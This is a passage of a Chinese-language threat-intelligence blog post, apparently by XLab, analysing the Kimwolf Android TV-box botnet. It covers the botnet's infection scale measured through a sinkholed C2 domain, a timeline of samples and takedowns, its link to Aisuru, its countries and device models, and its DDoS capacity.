IP&#x6570;&#x91CF;&#x51C6;&#x786E;&#x8861;&#x91CF;&#x88AB;&#x611F;&#x67D3;&#x8BBE;&#x5907;&#x7684;&#x771F;&#x5B9E;&#x89C4;&#x6A21;&#x3002;&#x6362;&#x8A00;&#x4E4B;&#xFF0C;&#x7D2F;&#x8BA1;&#x89C2;&#x6D4B;&#x5230;&#x7684;270&#x4E07;&#x4E2A;IP&#x5730;&#x5740;&#x5E76;&#x4E0D;&#x7B49;&#x540C;&#x4E8E;270&#x4E07;&#x53F0;&#x88AB;&#x611F;&#x67D3;&#x8BBE;&#x5907;&#x3002;</p>
<p>&#x5C3D;&#x7BA1;&#x5982;&#x6B64;&#xFF0C;&#x6211;&#x4EEC;&#x4ECD;&#x6709;&#x5145;&#x5206;&#x7406;&#x7531;&#x8BA4;&#x4E3A;&#xFF0C;kimwolf&#x5B9E;&#x9645;&#x611F;&#x67D3;&#x7684;&#x8BBE;&#x5907;&#x6570;&#x91CF;&#x8D85;&#x8FC7;180&#x4E07;&#x53F0;&#x3002;&#x8FD9;&#x4E00;&#x5224;&#x65AD;&#x57FA;&#x4E8E;&#x4EE5;&#x4E0B;&#x51E0;&#x4E2A;&#x65B9;&#x9762;&#x7684;&#x89C2;&#x5BDF;&#xFF1A;</p>
<ul>
<li>kimwolf&#x4F7F;&#x7528;&#x591A;&#x4E2A;C2&#x57FA;&#x7840;&#x8BBE;&#x65BD;&#x3002;&#x6211;&#x4EEC;&#x63A5;&#x7BA1;&#x7684;&#x4EC5;&#x662F;&#x5176;&#x4E2D;&#x4E00;&#x90E8;&#x5206;C2&#xFF0C;&#x56E0;&#x6B64;&#x53EA;&#x80FD;&#x89C2;&#x6D4B;&#x5230;&#x90E8;&#x5206;Bot&#x7684;&#x6D3B;&#x52A8;&#xFF0C;&#x65E0;&#x6CD5;&#x8986;&#x76D6;&#x6574;&#x4E2A;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x7684;&#x5168;&#x8C8C;&#x3002;</li>
<li>&#x5728;12&#x6708;4&#x65E5;&#xFF0C;&#x6211;&#x4EEC;&#x89C2;&#x6D4B;&#x5230;&#x7684;Bot IP&#x6570;&#x91CF;&#x8FBE;&#x5230;&#x7EA6;183&#x4E07;&#xFF0C;&#x4E3A;&#x5386;&#x53F2;&#x5CF0;&#x503C;&#x3002;&#x5F53;&#x5929;&#xFF0C;kimwolf &#x6B63;&#x5E38;&#x4F7F;&#x7528;&#x7684;&#x90E8;&#x5206;C2&#x88AB;&#x76F8;&#x5173;&#x673A;&#x6784;&#x5904;&#x7F6E;&#xFF0C;&#x5BFC;&#x81F4;&#x5927;&#x91CF;Bot&#x65E0;&#x6CD5;&#x8FDE;&#x63A5;&#x539F;&#x6709;C2&#xFF0C;&#x8F6C;&#x800C;&#x5C1D;&#x8BD5;&#x8FDE;&#x63A5;&#x6211;&#x4EEC;&#x62A2;&#x6CE8;&#x7684;C2&#x3002;&#x8FD9;&#x4E00;&#x5F02;&#x5E38;&#x4E8B;&#x4EF6;&#x4F7F;&#x5F97;&#x66F4;&#x591A;Bot &#x5728;&#x77ED;&#x65F6;&#x95F4;&#x5185;&#x96C6;&#x4E2D;&#x66B4;&#x9732;&#xFF0C;&#x56E0;&#x6B64;&#x8BE5;&#x65E5;&#x7684;&#x6570;&#x636E;&#x53EF;&#x80FD;&#x66F4;&#x63A5;&#x8FD1;&#x771F;&#x5B9E;&#x7684;&#x611F;&#x67D3;&#x89C4;&#x6A21;&#x4E0B;&#x9650;&#x3002;</li>
<li>&#x88AB;&#x611F;&#x67D3;&#x8BBE;&#x5907;&#x5206;&#x5E03;&#x5728;&#x5168;&#x7403;&#x591A;&#x4E2A;&#x65F6;&#x533A;&#x3002;&#x53D7;&#x65F6;&#x533A;&#x5DEE;&#x5F02;&#x548C;&#x4F7F;&#x7528;&#x4E60;&#x60EF;&#x5F71;&#x54CD;&#xFF08;&#x4F8B;&#x5982;&#x591C;&#x95F4;&#x5173;&#x673A;&#x3001;&#x8282;&#x5047;&#x65E5;&#x4E0D;&#x4F7F;&#x7528;&#x7535;&#x89C6;&#x76D2;&#x5B50;&#x7B49;&#xFF09;&#xFF0C;&#x8FD9;&#x4E9B;&#x8BBE;&#x5907;&#x5E76;&#x4E0D;&#x4F1A;&#x540C;&#x65F6;&#x5728;&#x7EBF;&#xFF0C;&#x8FDB;&#x4E00;&#x6B65;&#x589E;&#x52A0;&#x4E86;&#x901A;&#x8FC7;&#x5355;&#x4E00;&#x65F6;&#x95F4;&#x7A97;&#x53E3;&#x5168;&#x9762;&#x89C2;&#x6D4B;&#x7684;&#x96BE;&#x5EA6;&#x3002;</li>
<li>kimwolf &#x5B58;&#x5728;&#x591A;&#x4E2A;&#x4E0D;&#x540C;&#x7248;&#x672C;&#xFF0C;&#x4E14;&#x4E0D;&#x540C;&#x7248;&#x672C;&#x4F7F;&#x7528;&#x7684;C2&#x5E76;&#x4E0D;&#x5B8C;&#x5168;&#x76F8;&#x540C;&#xFF0C;&#x8FD9;&#x4E5F;&#x662F;&#x6211;&#x4EEC;&#x65E0;&#x6CD5;&#x83B7;&#x53D6;&#x5B8C;&#x6574;&#x89C6;&#x89D2;&#x7684;&#x91CD;&#x8981;&#x539F;&#x56E0;&#x4E4B;&#x4E00;</li>
</ul>
<p>&#x7EFC;&#x5408;&#x4EE5;&#x4E0A;&#x56E0;&#x7D20;&#xFF0C;&#x6211;&#x4EEC;&#x4FDD;&#x5B88;&#x4F30;&#x8BA1; kimwolf &#x7684;&#x5B9E;&#x9645;&#x611F;&#x67D3;&#x8BBE;&#x5907;&#x6570;&#x91CF;&#x5DF2;&#x8D85;&#x8FC7;<strong>180&#x4E07;</strong>&#x53F0;&#x3002;&#x5982;&#x6B64;&#x89C4;&#x6A21;&#x7684;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x5177;&#x5907;&#x53D1;&#x52A8;&#x5927;&#x89C4;&#x6A21;&#x7F51;&#x7EDC;&#x653B;&#x51FB;&#x7684;&#x80FD;&#x529B;&#xFF0C;&#x5176;&#x6F5C;&#x5728;&#x7834;&#x574F;&#x529B;&#x4E0D;&#x5BB9;&#x5FFD;&#x89C6;&#x3002;</p>
<p>&#x5728;&#x52AA;&#x529B;&#x8DDF;&#x8E2A;&#x65B0;&#x7248;&#x672C;&#x7684;&#x540C;&#x65F6;&#xFF0C;&#x6211;&#x4EEC;&#x4E5F;&#x5BF9;&#x65E7;&#x7248;&#x672C;&#x5145;&#x6EE1;&#x4E86;&#x597D;&#x5947;&#x3002;&#x901A;&#x8FC7;&#x6EAF;&#x6E90;&#x5206;&#x6790;&#xFF0C;&#x867D;&#x7136;&#x6CA1;&#x80FD;&#x6355;&#x83B7;v1,v2&#x4E4B;&#x7C7B;&#x7684;&#x65E7;&#x7248;&#x672C;&#xFF0C;&#x4F46;&#x662F;&#x6211;&#x4EEC;&#x60CA;&#x5947;&#x7684;&#x53D1;&#x73B0;Kimwolf&#x5C45;&#x7136;&#x548C;<a href="https://blog.xlab.qianxin.com/super-large-scale-botnet-aisuru/">Aisuru&#x50F5;&#x5C38;&#x7F51;&#x7EDC;</a>&#x5173;&#x8054;&#x5728;&#x4E00;&#x8D77;&#x3002;Kimwolf&#x8FD0;&#x884C;&#x65F6;&#x4F9D;&#x8D56;&#x4E00;&#x4E2A;APK&#x6587;&#x4EF6;&#x5C06;&#x5B83;&#x52A0;&#x8F7D;&#x542F;&#x52A8;&#xFF0C;&#x4E00;&#x4E2A;&#x4E8E;10&#x6708;7&#x65E5;&#x7531;&#x5370;&#x5EA6;&#x4E0A;&#x4F20;&#x5230;VT&#x7684;DEX&#x6587;&#x4EF6;&#x8868;&#x73B0;&#x51FA;&#x4E86;&#x548C;Kimwolf&#x7684;APK&#x660E;&#x663E;&#x7684;&#x540C;&#x6E90;&#x7279;&#x5F81;&#xFF0C;&#x968F;&#x540E;&#x5728;10&#x6708;18&#x65E5;&#x8BE5;DEX&#x7684;&#x6BCD;&#x4F53;APK&#x4E8E;&#x963F;&#x5C14;&#x53CA;&#x5229;&#x4E9A;&#x88AB;&#x4E0A;&#x4F20;&#x81F3;VT&#xFF0C;&#x8BE5;APK&#x7684;&#x8D44;&#x6E90;&#x6587;&#x4EF6;&#x5305;&#x542B;x86,x64,arm3&#x4E2A;CPU&#x67B6;&#x6784;&#x7684;Aisuru&#x6837;&#x672C;&#x3002;&#x6211;&#x4EEC;&#x63A8;&#x6D4B;&#x6B64;&#x6B21;&#x6D3B;&#x52A8;&#x521D;&#x671F;&#xFF0C;&#x653B;&#x51FB;&#x8005;&#x76F4;&#x63A5;&#x590D;&#x7528;&#x4E86; Aisuru &#x7684;&#x4EE3;&#x7801;&#x5C55;&#x5F00;&#x6D3B;&#x52A8;&#xFF1B;&#x968F;&#x540E;&#xFF0C;&#x53EF;&#x80FD;&#x7531;&#x4E8E; Aisuru &#x6837;&#x672C;&#x5728;&#x5B89;&#x5168;&#x4EA7;&#x54C1;&#x4E2D;&#x7684;&#x68C0;&#x6D4B;&#x7387;&#x8F83;&#x9AD8;&#x2014;&#x2014;&#x4E0E; IoT &#x751F;&#x6001;&#x76F8;&#x6BD4;&#xFF0C;Android &#x5E73;&#x53F0;&#x5177;&#x5907;&#x66F4;&#x6210;&#x719F;&#x7684;&#x5B89;&#x5168;&#x9632;&#x62A4;&#x4F53;&#x7CFB;&#x2014;&#x2014;&#x8BE5;&#x56E2;&#x4F19;&#x51B3;&#x5B9A;&#x91CD;&#x65B0;&#x8BBE;&#x8BA1;&#x5E76;&#x5F00;&#x53D1;&#x4E86; Kimwolf &#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#xFF0C;&#x4EE5;&#x589E;&#x5F3A;&#x9690;&#x853D;&#x6027;&#xFF0C;&#x89C4;&#x907F;&#x68C0;&#x6D4B;&#x3002;</p>
<p>&#x4ECE;XLab&#x6307;&#x4EE4;&#x8DDF;&#x8E2A;&#x7CFB;&#x7EDF;&#x7684;&#x76D1;&#x6D4B;&#x6570;&#x636E;&#x6765;&#x770B;&#xFF0C;&#x7EDF;&#x8BA1;&#x663E;&#x793A;Kimwolf&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x7684;&#x4E3B;&#x8981;&#x529F;&#x80FD;&#x901A;&#x5E38;&#x96C6;&#x4E2D;&#x4E8E;&#x6D41;&#x91CF;&#x4EE3;&#x7406;&#xFF0C;&#x5C11;&#x91CF;DDoS&#x653B;&#x51FB;&#x3002;&#x7136;&#x800C;&#x5728;11&#x6708;19&#x65E5;&#x81F3;22&#x65E5;&#x671F;&#x95F4;&#xFF0C;&#x5B83;&#x7A81;&#x7136;&#x201C;&#x53D1;&#x75AF;&#x201D;&#xFF1A;&#x77ED;&#x77ED;&#x7684;3&#x5929;&#xFF0C;&#x4E0B;&#x53D1;&#x4E86;17&#x4EBF;&#x6761;DDoS&#x653B;&#x51FB;&#x6307;&#x4EE4;&#xFF0C;&#x653B;&#x51FB;&#x8303;&#x56F4;&#x51E0;&#x4E4E;&#x8986;&#x76D6;&#x5168;&#x7403;&#x5927;&#x91CF;IP&#x5730;&#x5740;&#x3002;&#x8FD9;&#x662F;C2&#x57DF;&#x540D;&#x6D41;&#x884C;&#x5EA6;&#x767B;&#x9876;&#x4E8B;&#x4EF6;&#x4E4B;&#x540E;&#xFF0C;&#x53C8;&#x4E00;&#x6B21;&#x9AD8;&#x8C03;&#x4E14;&#x75AF;&#x72C2;&#x7684;&#x884C;&#x52A8;&#xFF0C;&#x7406;&#x8BBA;&#x4E0A;&#x6765;&#x8BF4;&#x5982;&#x6B64;&#x591A;&#x7684;&#x653B;&#x51FB;&#x6307;&#x4EE4;&#x548C;&#x653B;&#x51FB;&#x76EE;&#x6807;&#x53EF;&#x80FD;&#x65E0;&#x6CD5;&#x5BF9;&#x76EE;&#x6807;&#x4EA7;&#x751F;&#x5B9E;&#x8D28;&#x6027;&#x7684;&#x653B;&#x51FB;&#x6548;&#x679C;&#xFF0C;&#x8FD9;&#x6B21;&#x884C;&#x4E3A;&#x53EF;&#x80FD;&#x662F;&#x7EAF;&#x7CB9;&#x4E3A;&#x4E86;&#x5F70;&#x663E;&#x81EA;&#x8EAB;&#x5B58;&#x5728;&#x611F;&#x3002;</p>
<p>&#x5F53;&#x524D;&#xFF0C;&#x5B89;&#x5168;&#x793E;&#x533A;&#x5BF9;Kimwolf&#x7684;&#x8BA4;&#x77E5;&#x5448;&#x73B0;&#x4E24;&#x6781;&#x5206;&#x5316;&#x6001;&#x52BF;&#x3002;<strong>&#x516C;&#x5F00;&#x60C5;&#x62A5;&#x9886;&#x57DF;&#x4FE1;&#x606F;&#x7A00;&#x7F3A;</strong>&#xFF0C;&#x5176;&#x4F20;&#x64AD;&#x8DEF;&#x5F84;&#x5C1A;&#x672A;&#x660E;&#x786E;&#xFF0C;&#x76F8;&#x5173;&#x6837;&#x672C;&#x53CA;&#x5176;C2&#x57DF;&#x540D;&#x5728;VirusTotal&#x4E0A;&#x7684;&#x68C0;&#x51FA;&#x7387;&#x6781;&#x4F4E;&#x3002;&#x540C;&#x65F6;&#xFF0C;&#x7531;&#x4E8E;&#x91C7;&#x7528;&#xFF08;DOT&#xFF09;&#x7B49;&#x9690;&#x853D;&#x6280;&#x672F;&#xFF0C;&#x5176;C2&#x4E0E;&#x6837;&#x672C;&#x4E4B;&#x95F4;&#x7684;&#x5173;&#x8054;&#x6027;&#x4E5F;&#x672A;&#x80FD;&#x88AB;&#x6709;&#x6548;&#x53D1;&#x73B0;&#x3002;&#x7136;&#x800C;&#xFF0C;<strong>&#x5728;&#x975E;&#x516C;&#x5F00;&#x7684;&#x5A01;&#x80C1;&#x5BF9;&#x6297;&#x5C42;&#x9762;</strong>&#xFF0C;&#x60C5;&#x51B5;&#x622A;&#x7136;&#x4E0D;&#x540C;&#x3002;&#x6211;&#x4EEC;&#x89C2;&#x5BDF;&#x5230;Kimwolf&#x7684;C2&#x57DF;&#x540D;&#x5DF2;&#x88AB;&#x672A;&#x77E5;&#x65B9;&#x6210;&#x529F;&#x5904;&#x7F6E;&#x81F3;&#x5C11;&#x4E09;&#x6B21;&#xFF0C;&#x8FEB;&#x4F7F;&#x5176;&#x6218;&#x672F;&#x5347;&#x7EA7;&#xFF0C;&#x8F6C;&#x800C;&#x5229;&#x7528;<code>&#x57FA;&#x4E8E;&#x533A;&#x5757;&#x94FE;&#x7684;&#x547D;&#x540D;&#x670D;&#x52A1;&#xFF08;&#x4F8B;&#x5982;Ethereum Name Service&#xFF0C;&#x5373; .eth &#x57DF;&#x540D;&#xFF09;</code>&#x6765;&#x52A0;&#x56FA;&#x57FA;&#x7840;&#x8BBE;&#x65BD;&#xFF0C;&#x663E;&#x793A;&#x51FA;&#x5176;&#x5F3A;&#x5927;&#x6F14;&#x5316;&#x80FD;&#x529B;&#x3002;&#x9274;&#x4E8E;Kimwolf&#x5DF2;&#x5F62;&#x6210;&#x5E9E;&#x5927;&#x653B;&#x51FB;&#x89C4;&#x6A21;&#xFF0C;&#x4E14;&#x8FD1;&#x671F;&#x6D3B;&#x52A8;&#x9891;&#x7387;&#x4E0E;&#x653B;&#x51FB;&#x884C;&#x4E3A;&#x5448;&#x663E;&#x8457;&#x4E0A;&#x5347;&#x8D8B;&#x52BF;&#xFF0C;&#x6211;&#x65B9;&#x8BA4;&#x4E3A;&#x6709;&#x5FC5;&#x8981;&#x6253;&#x7834;&#x60C5;&#x62A5;&#x6C89;&#x9ED8;&#x3002;&#x7279;&#x6B64;&#x53D1;&#x5E03;&#x672C;&#x6280;&#x672F;&#x5206;&#x6790;&#x62A5;&#x544A;&#xFF0C;&#x516C;&#x5F00;&#x76F8;&#x5173;&#x7814;&#x7A76;&#x6210;&#x679C;&#xFF0C;&#x65E8;&#x5728;&#x63A8;&#x52A8;&#x5A01;&#x80C1;&#x60C5;&#x62A5;&#x5171;&#x4EAB;&#xFF0C;&#x51DD;&#x805A;&#x793E;&#x533A;&#x529B;&#x91CF;&#x5171;&#x540C;&#x5E94;&#x5BF9;&#x6B64;&#x6B64;&#x7C7B;&#x5A01;&#x80C1;&#xFF0C;&#x5207;&#x5B9E;&#x7EF4;&#x62A4;&#x7F51;&#x7EDC;&#x7A7A;&#x95F4;&#x5B89;&#x5168;&#x3002;</p>
<h1 id="%E6%97%B6%E9%97%B4%E7%BA%BF">&#x65F6;&#x95F4;&#x7EBF;</h1>
<ul>
<li>
<p>10&#x6708;24&#x65E5;&#xFF0C;&#x793E;&#x533A;&#x4FE1;&#x4EFB;&#x4F19;&#x4F34;&#x5411;&#x6211;&#x4EEC;&#x63D0;&#x4F9B;&#x4E86;&#x9996;&#x4E2A; kimwolf &#x6837;&#x672C;&#xFF0C;&#x7248;&#x672C;&#x4E3A; v4&#x3002;</p>
</li>
<li>
<p>11&#x6708;1&#x65E5;&#x81F3;28&#x65E5;&#xFF0C;Xlab &#x5927;&#x7F51;&#x5A01;&#x80C1;&#x611F;&#x77E5;&#x7CFB;&#x7EDF;&#x72EC;&#x7ACB;&#x6355;&#x83B7;8&#x4E2A;&#x65B0;&#x6837;&#x672C;&#xFF0C;&#x6DB5;&#x76D6; v4 &#x4E0E; v5 &#x7248;&#x672C;&#x3002;</p>
</li>
<li>
<p>12&#x6708;1&#x65E5;&#xFF0C;Xlab &#x6210;&#x529F;&#x63A5;&#x7BA1; v5 &#x7248;&#x672C;&#x4E2D;&#x7684;&#x4E00;&#x4E2A; C2 &#x57DF;&#x540D;&#xFF0C;&#x89C2;&#x6D4B;&#x5230;&#x7684;&#x65E5;&#x6D3B;&#x8DC3; bot IP&#x6570;&#x91CF;&#x5CF0;&#x503C;&#x7EA6;&#x8FBE; 183 &#x4E07;&#x3002;</p>
</li>
<li>
<p>12&#x6708;4&#x65E5;&#xFF0C;Kimwolf C2&#x57DF;&#x540D;&#x88AB;&#x672A;&#x77E5;&#x65B9;&#x5904;&#x7F6E;&#xFF0C;C2&#x57DF;&#x540D;&#x65E0;&#x6CD5;&#x89E3;&#x6790;&#x5230;&#x6709;&#x6548;&#x7684;IP&#x5730;&#x5740;&#x3002;</p>
</li>
</ul>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_error1.png" alt="&#x53F2;&#x4E0A;&#x6700;&#x75AF;&#xFF1A;&#x72EC;&#x5BB6;&#x63ED;&#x79D8;&#x611F;&#x67D3;&#x5168;&#x7403;180&#x4E07;Android&#x8BBE;&#x5907;&#x7684;&#x5DE8;&#x578B;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;Kimwolf" loading="lazy"></p>
<ul>
<li>12&#x6708;6&#x65E5;&#xFF0C;Xlab&#x518D;&#x6B21;&#x6355;&#x83B7;&#x5230;&#x65B0;&#x7684; v5 &#x6837;&#x672C;&#xFF0C;&#x8BE5;&#x6837;&#x672C;&#x542F;&#x7528;6&#x4E2A;&#x65B0;&#x7684; C2 &#x5730;&#x5740;&#x3002;</li>
<li>12&#x6708;8&#x65E5;&#xFF0C;&#x53D1;&#x73B0;&#x5728;&#x91CE;&#x6D3B;&#x8DC3;&#x7684;&#x4E0B;&#x8F7D;&#x670D;&#x52A1;&#x5668;&#xFF0C;&#x6210;&#x529F;&#x6355;&#x83B7;kimwolf&#x6D3B;&#x52A8;&#x76F8;&#x5173;&#x811A;&#x672C;&#x3002;</li>
<li>12&#x6708;10&#x65E5;&#xFF0C;Kimwolf&#x7684;&#x65B0;C2&#x57DF;&#x540D;&#x518D;&#x6B21;&#x88AB;&#x5904;&#x7F6E;</li>
</ul>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_error2.png" alt="&#x53F2;&#x4E0A;&#x6700;&#x75AF;&#xFF1A;&#x72EC;&#x5BB6;&#x63ED;&#x79D8;&#x611F;&#x67D3;&#x5168;&#x7403;180&#x4E07;Android&#x8BBE;&#x5907;&#x7684;&#x5DE8;&#x578B;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;Kimwolf" loading="lazy"></p>
<ul>
<li>12&#x6708;11&#x65E5;&#xFF0C;Xlab&#x518D;&#x6B21;&#x6355;&#x83B7;&#x5230;&#x65B0;&#x7684; v5 &#x6837;&#x672C;&#xFF0C;&#x8BE5;&#x6837;&#x672C;&#x7684;&#x542F;&#x7528;&#x4E00;&#x4E2A;&#x5168;&#x65B0;&#x7684;C2&#x57DF;&#x540D;&#xFF0C;&#x4F46;C2&#x7AEF;&#x53E3;&#x5E76;&#x672A;&#x5F00;&#x653E;&#xFF1B;&#x6BCD;&#x4F53;APK&#x8BC1;&#x4E66;&#x66F4;&#x65B0;&#x3002;</li>
<li>12&#x6708;12&#x65E5;&#xFF0C;Kimwolf&#x518D;&#x6B21;&#x5347;&#x7EA7;&#x57FA;&#x7840;&#x8BBE;&#x65BD;&#xFF0C;&#x901A;&#x8FC7;&#x5F15;&#x5165;&#x533A;&#x5757;&#x94FE;&#x7684;&#x57DF;&#x540D;&#x6765;&#x589E;&#x5F3A;C2&#x7684;&#x6297;&#x6253;&#x51FB;&#x80FD;&#x529B;&#xFF0C;&#x4EE5;&#x56DE;&#x5E94;&#x6B64;&#x524D;&#x906D;&#x5230;&#x7684;&#x591A;&#x6B21;&#x5904;&#x7F6E;&#xFF0C;&#x751A;&#x81F3;&#x56A3;&#x5F20;&#x5BA3;&#x79F0;&#x201C;&#x624B;&#x63E1;&#x767E;&#x53F0;&#x670D;&#x52A1;&#x5668;&#xFF0C;&#x6B22;&#x8FCE;&#x6765;&#x5C01;&#x201D;&#x3002;</li>
</ul>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_ens.png" alt="&#x53F2;&#x4E0A;&#x6700;&#x75AF;&#xFF1A;&#x72EC;&#x5BB6;&#x63ED;&#x79D8;&#x611F;&#x67D3;&#x5168;&#x7403;180&#x4E07;Android&#x8BBE;&#x5907;&#x7684;&#x5DE8;&#x578B;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;Kimwolf" loading="lazy"></p>
<h1 id="%E6%84%9F%E6%9F%93%E8%A7%84%E6%A8%A1-%E6%94%BB%E5%87%BB%E8%83%BD%E5%8A%9B">&#x611F;&#x67D3;&#x89C4;&#x6A21; &amp; &#x653B;&#x51FB;&#x80FD;&#x529B;</h1>
<p>12&#x6708;1&#x65E5;&#xFF0C;&#x6211;&#x4EEC;&#x6210;&#x529F;&#x63A5;&#x7BA1;&#x4E86;&#x4E00;&#x4E2A;Kimwolf&#x7684;C2&#x57DF;&#x540D;&#xFF0C;&#x9996;&#x6B21;&#x5F97;&#x4EE5;&#x76F4;&#x63A5;&#x8BC4;&#x4F30;&#x8BE5;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x7684;&#x771F;&#x5B9E;&#x611F;&#x67D3;&#x89C4;&#x6A21;&#x3002;&#x4ECE;&#x7EDF;&#x8BA1;&#x6570;&#x636E;&#x6765;&#x770B;&#xFF0C;&#x7D2F;&#x8BA1;&#x611F;&#x67D3;IP&#x8D85;&#x8FC7;366&#x4E07;&#xFF0C;&#x5E76;&#x4E8E;12&#x6708;4&#x65E5;&#x8FBE;&#x5230;&#x6D3B;&#x8DC3;&#x5CF0;&#x503C;&#xFF0C;&#x5355;&#x65E5;&#x8282;&#x70B9;IP&#x9AD8;&#x8FBE;1829977&#x3002;&#x6211;&#x4EEC;&#x7684;&#x63A5;&#x7BA1;&#x884C;&#x52A8;&#x4F3C;&#x4E4E;&#x89E6;&#x53D1;&#x4E86;&#x8FDE;&#x9501;&#x53CD;&#x5E94;&#xFF0C;&#x968F;&#x540E;&#x672A;&#x77E5;&#x7B2C;&#x4E09;&#x65B9;&#x5BF9;Kimwolf&#x7684;&#x5176;&#x4ED6;C2&#x57FA;&#x7840;&#x8BBE;&#x65BD;&#x5B9E;&#x65BD;&#x4E86;&#x5904;&#x7F6E;&#xFF08;&#x5982;&#x505C;&#x6B62;DNS&#x89E3;&#x6790;&#xFF09;&#x3002;&#x6B64;&#x4E3E;&#x7834;&#x4F7F;Kimwolf&#x7684;&#x8FD0;&#x8425;&#x8005;&#x4E0D;&#x5F97;&#x4E0D;&#x7D27;&#x6025;&#x8FDB;&#x884C;&#x5347;&#x7EA7;&#xFF0C;&#x5168;&#x9762;&#x66FF;&#x6362;&#x6837;&#x672C;&#x7684;C2&#x914D;&#x7F6E;&#xFF0C;&#x8FD9;&#x5BFC;&#x81F4;&#x6211;&#x4EEC;&#x89C2;&#x6D4B;&#x5230;&#x7684;&#x6570;&#x5B57;&#x6025;&#x5267;&#x4E0B;&#x964D;&#xFF0C;&#x5F53;&#x524D;&#x65E5;&#x6D3B;&#x89C4;&#x6A21;&#x5728;20&#x4E07;&#x5DE6;&#x53F3;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_sinkhole.png" alt="&#x53F2;&#x4E0A;&#x6700;&#x75AF;&#xFF1A;&#x72EC;&#x5BB6;&#x63ED;&#x79D8;&#x611F;&#x67D3;&#x5168;&#x7403;180&#x4E07;Android&#x8BBE;&#x5907;&#x7684;&#x5DE8;&#x578B;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;Kimwolf" loading="lazy"></p>
<p>Kimwolf&#x4E3B;&#x8981;&#x9488;&#x5BF9;&#x5B89;&#x5353;&#x5E73;&#x53F0;&#xFF0C;&#x6D89;&#x53CA;&#x7535;&#x89C6;&#x3001;&#x673A;&#x9876;&#x76D2;&#xFF0C;&#x5E73;&#x677F;&#x7B49;&#x8BBE;&#x5907;&#xFF0C;&#x90E8;&#x5206;&#x8BBE;&#x5907;&#x578B;&#x53F7;&#x5982;&#x4E0B;&#x6240;&#x793A;&#xFF1A;</p>
<table>
<thead>
<tr>
<th>Device Model</th>
<th>Device Model</th>
<th>Device Model</th>
<th>Device Model</th>
</tr>
</thead>
<tbody>
<tr>
<td>TV BOX</td>
<td>SuperBOX</td>
<td>HiDPTAndroid</td>
<td>P200</td>
</tr>
<tr>
<td>X96Q</td>
<td>XBOX</td>
<td>SmartTV</td>
<td>MX10</td>
</tr>
</tbody>
</table>
<p>&#x611F;&#x67D3;&#x8BBE;&#x5907;&#x5206;&#x5E03;&#x5728;&#x5168;&#x7403;222&#x4E2A;&#x56FD;&#x5BB6;&#x548C;&#x5730;&#x533A;&#xFF0C;&#x6392;&#x540D;&#x524D;15&#x56FD;&#x5BB6;&#x5206;&#x6790;&#x4E3A;&#x5DF4;&#x897F;14.63%&#xFF0C;&#x5370;&#x5EA6;12.71%&#xFF0C;&#x7F8E;&#x56FD;9.58%&#xFF0C;&#x963F;&#x6839;&#x5EF7;7.19%&#xFF0C;&#x5357;&#x975E;3.85%&#xFF0C;&#x83F2;&#x5F8B;&#x5BBE;3.58%&#xFF0C;&#x58A8;&#x897F;&#x54E5;3.07%&#xFF0C;&#x4E2D;&#x56FD;3.04%&#xFF0C;&#x6CF0;&#x56FD;2.46%&#xFF0C;&#x6C99;&#x7279;<br>
2.37%&#xFF0C;&#x5370;&#x5EA6;&#x5C3C;&#x897F;&#x4E9A;1.87%&#xFF0C;&#x6469;&#x6D1B;&#x54E5;1.85%&#xFF0C;&#x571F;&#x8033;&#x5176;1.60%&#xFF0C;&#x4F0A;&#x62C9;&#x514B;1.53%&#xFF0C;&#x5DF4;&#x57FA;&#x65AF;&#x5766;1.39% &#x3002;<br>
<img src="https://blog.xlab.qianxin.com/content/images/2025/12/kimwolf_vic-1.png" alt="&#x53F2;&#x4E0A;&#x6700;&#x75AF;&#xFF1A;&#x72EC;&#x5BB6;&#x63ED;&#x79D8;&#x611F;&#x67D3;&#x5168;&#x7403;180&#x4E07;Android&#x8BBE;&#x5907;&#x7684;&#x5DE8;&#x578B;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;Kimwolf" loading="lazy"></p>
<p>&#x719F;&#x6089;DDoS&#x7684;&#x8BFB;&#x8005;&#x53EF;&#x80FD;&#x4F1A;&#x597D;&#x5947;&#xFF1A;&#x201C;&#x5982;&#x6B64;&#x5E9E;&#x5927;&#x7684;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#xFF0C;&#x5176;&#x653B;&#x51FB;&#x80FD;&#x529B;&#x7A76;&#x7ADF;&#x8FBE;&#x5230;&#x4E86;&#x4F55;&#x79CD;&#x6C34;&#x5E73;&#xFF1F;&#x201D;&#x867D;&#x7136;&#x6211;&#x4EEC;&#x65E0;&#x6CD5;&#x76F4;&#x63A5;&#x5EA6;&#x91CF;&#xFF0C;&#x4F46;&#x901A;&#x8FC7;&#x4E24;&#x6B21;&#x5927;&#x578B;DDoS&#x4E8B;&#x4EF6;&#x7684;&#x89C2;&#x5BDF;&#x4EE5;&#x53CA;&#x4E0E;Aisuru&#x7684;&#x6A2A;&#x5411;&#x5BF9;&#x6BD4;&#xFF0C;&#x6211;&#x4EEC;&#x8BA4;&#x4E3A;Kimwolf&#x7684;&#x653B;&#x51FB;&#x80FD;&#x529B;&#x5DF2;&#x63A5;&#x8FD1;30Tbps&#x3002;</p>
<ul>
<li>&#x67D0;&#x77E5;&#x540D;&#x4E91;&#x670D;&#x52A1;&#x5546;&#x5728;11&#x6708;23&#x65E5;22&#xFF1A;09Z&#x89C2;&#x6D4B;&#x5230;&#x4E00;&#x8D77;2.3Bpps&#x7684;&#x653B;&#x51FB;&#xFF0C;&#x53C2;&#x4E0E;&#x653B;&#x51FB;&#x7684;IP&#x6570;&#x91CF;&#x4E3A;45&#x4E07;&#xFF0C;&#x6211;&#x65B9;&#x786E;&#x8BA4;Kimwolf&#x53C2;&#x4E0E;&#x5176;&#x4E2D;&#x3002;</li>
